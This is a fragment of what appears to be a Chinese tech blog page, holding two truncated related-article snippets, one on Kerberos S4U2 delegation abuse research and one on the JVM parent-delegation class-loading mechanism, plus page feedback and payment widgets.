07-07 1678
Kerberos 委派攻击原理之 S4U2 利用详解 为了更好地防止约束委派的滥用,请查看"从Kekeo到Rubeus"文章中的"s4u"部分。 几周前,我和同事李·克里斯滕森(在他的帮助下我完成了这篇文章和相关材料)花了一些时间深入研究了活动目录的S4U2Self和S4U2Proxy协议扩展。就在最近,本杰明·德尔皮和Ben Campbell在推特上就同一话题进行...
JVM - 双亲委派机制
09-06
JVM中的双亲委派机制是一种类加载机制,它规定了在Java中一个类被加载时如何进行类加载器的选择。根据这个机制,当一个类需要被加载时,首先会由类加载器ClassLoader检查是否已经加载过该类,如果是,则直接返回已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值